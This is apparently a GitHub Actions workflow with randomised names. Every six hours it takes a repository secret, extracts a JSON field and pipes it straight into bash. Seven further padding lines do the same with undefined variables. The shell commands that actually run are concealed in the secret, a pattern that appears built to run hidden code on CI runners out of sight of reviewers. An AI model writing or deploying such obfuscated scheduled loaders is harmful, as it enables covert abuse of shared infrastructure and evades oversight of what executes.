name: zongjiangmingliang
on:
  workflow_dispatch:
  schedule:
    - cron: '46 0/6 * * *'
jobs:  # 29074
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zongjiangmingliang
        env:
          q176: ${{ secrets.q176 }}
        run: |
          echo $q176 | jq -r .kud9 | /bin/bash
          echo $czicx6434 | jq -r .vizwm08855 | /bin/bash
          echo $nbkl20170 | jq -r .za495 | /bin/bash
          echo $xt87 | jq -r .ztrsj8248 | /bin/bash
          echo $on57575 | jq -r .lanpb48222 | /bin/bash
          echo $lycim9512 | jq -r .wzobn31410 | /bin/bash
          echo $tpq145 | jq -r .ypnar1 | /bin/bash
          echo $jrci42 | jq -r .gg230 | /bin/bash

